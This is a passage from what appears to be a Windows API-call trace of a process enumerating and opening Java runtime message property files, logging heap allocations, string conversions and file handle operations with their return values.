(HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0094.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties") returned 69 [0094.874] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.875] GetFileType (hFile=0x368) returned 0x1 [0094.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0094.875] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.875] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.875] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.876] CloseHandle (hObject=0x368) returned 1 [0094.876] AreFileApisANSI () returned 1 [0094.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0094.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0094.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties") returned 69 [0094.876] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.876] GetFileType (hFile=0x368) returned 0x1 [0094.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0094.876] CloseHandle (hObject=0x368) returned 1 [0094.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0094.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0094.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0094.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0094.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0094.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0094.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0094.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0094.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0094.878] AreFileApisANSI () returned 1 [0094.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0094.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8abb8 [0094.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties") returned 69 [0094.878] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x18cd)) returned 1 [0094.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0094.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0094.878] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.878] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.878] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1650, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="messages_ko.properties", cAlternateFileName="ME1706~1.PRO")) returned 1 [0094.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0094.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0094.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0094.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0094.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0094.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0094.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0094.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0094.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0094.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0094.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0094.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0094.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0094.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0094.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0094.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0094.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0094.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0094.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0094.879] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.879] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.879] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.879] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0094.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0094.879] AreFileApisANSI () returned 1 [0094.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties", lpUsedDefaultChar=0x0) returned 69 [0094.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0094.879] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.879] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0094.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0094.879] AreFileApisANSI () returned 1 [0094.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0094.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0094.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties") returned 69 [0094.879] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.879] GetFileType (hFile=0x368) returned 0x1 [0094.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0094.880] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.880] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.880] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.880] CloseHandle (hObject=0x368) returned 1 [0094.880] AreFileApisANSI () returned 1 [0094.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0094.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0094.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties") returned 69 [0094.880] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.880] GetFileType (hFile=0x368) returned 0x1 [0094.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0094.881] CloseHandle (hObject=0x368) returned 1 [0094.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0094.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0094.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0094.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0094.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0094.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0094.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0094.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0094.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0094.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0094.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0094.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0094.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0094.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0094.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0094.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0094.882] AreFileApisANSI () returned 1 [0094.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0094.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0094.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties") returned 69 [0094.882] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1650)) returned 1 [0094.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0094.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0094.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.882] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xcd5, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="messages_pt_BR.properties", cAlternateFileName="MED1E1~1.PRO")) returned 1 [0094.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0094.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693a0 [0094.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0094.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0094.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0094.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0094.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0094.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0094.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693a0 | out: hHeap=0x20000) returned 1 [0094.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68fe0 [0094.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0094.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0094.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0094.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0094.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0094.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0094.883] HeapFree (in: 